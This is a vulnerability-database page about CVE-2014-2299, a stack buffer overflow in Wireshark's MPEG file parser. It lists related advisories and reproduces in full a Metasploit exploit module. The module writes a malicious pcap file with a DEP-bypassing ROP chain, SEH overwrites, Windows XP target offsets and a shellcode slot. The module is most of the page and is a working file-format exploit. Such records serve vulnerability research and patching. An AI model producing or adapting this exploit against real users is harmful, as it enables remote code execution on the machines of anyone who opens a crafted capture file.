Vulners
Lucene search
Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
| Reporter | Title | Published | Views | Family All 96 |
|---|---|---|---|---|
 | Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow | 26 Apr 201400:00 | – | zdt |
 | Medium: wireshark | 25 Apr 201400:00 | – | amazon |
 | Amazon Linux AMI : wireshark (ALAS-2014-330) | 12 Oct 201400:00 | – | nessus |
| CentOS 5 : wireshark (CESA-2014:0341) | 1 Apr 201400:00 | – | nessus |
| CentOS 6 : wireshark (CESA-2014:0342) | 1 Apr 201400:00 | – | nessus |
| Debian DSA-2871-1 : wireshark - several vulnerabilities | 11 Mar 201400:00 | – | nessus |
| Fedora 20 : wireshark-1.10.6-1.fc20 (2014-3676) | 19 Mar 201400:00 | – | nessus |
| Fedora 19 : wireshark-1.10.6-1.fc19 (2014-3696) | 19 Mar 201400:00 | – | nessus |
| GLSA-201406-33 : Wireshark: Multiple vulnerabilities | 30 Jun 201400:00 | – | nessus |
| Mandriva Linux Security Advisory : wireshark (MDVSA-2014:050) | 11 Mar 201400:00 | – | nessus |
10
`#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
'Description' => %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Wesley Neelen', # Discovery vulnerability
'j0sm1', # Exploit and msf module
],
'References' =>
[
[ 'CVE', '2014-2299'],
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
[ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'BadChars' => "\xff",
'Space' => 600,
'DisableNops' => 'True',
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
},
'Platform' => 'win',
'Targets' =>
[
[ 'WinXP SP3 Spanish (bypass DEP)',
{
'OffSet' => 69732,
'OffSet2' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
'jmpesp' => 0x68e2bfb9,
}
],
[ 'WinXP SP2/SP3 English (bypass DEP)',
{
'OffSet2' => 70692,
'OffSet' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
'jmpesp' => 0x68e2bfb9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 20 2014'
))
register_options(
[
OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
], self.class)
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x00000201, # 0x00000201-> ebx
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
0x00000040, # 0x00000040-> edx
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x668242b9, # &Writable location [libgnutls-26.dll]
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x90909090, # nop
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ropchain = create_rop_chain
magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
# Here we build the packet data
packet = rand_text_alpha(883)
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << ropchain
packet << payload.encoded # Shellcode
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
# After nseh and seh we haven't space, then we have to jump to another location.
# When file is open with command line. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
# When file is open with GUI interface. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
packet << "\x55\x59\x80\x6b"
print_status("Preparing payload")
filecontent = magic_header
filecontent << packet
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
file_create(filecontent)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Apr 2014 00:00Current
1Low risk
Vulners AI Score1
EPSS0.6692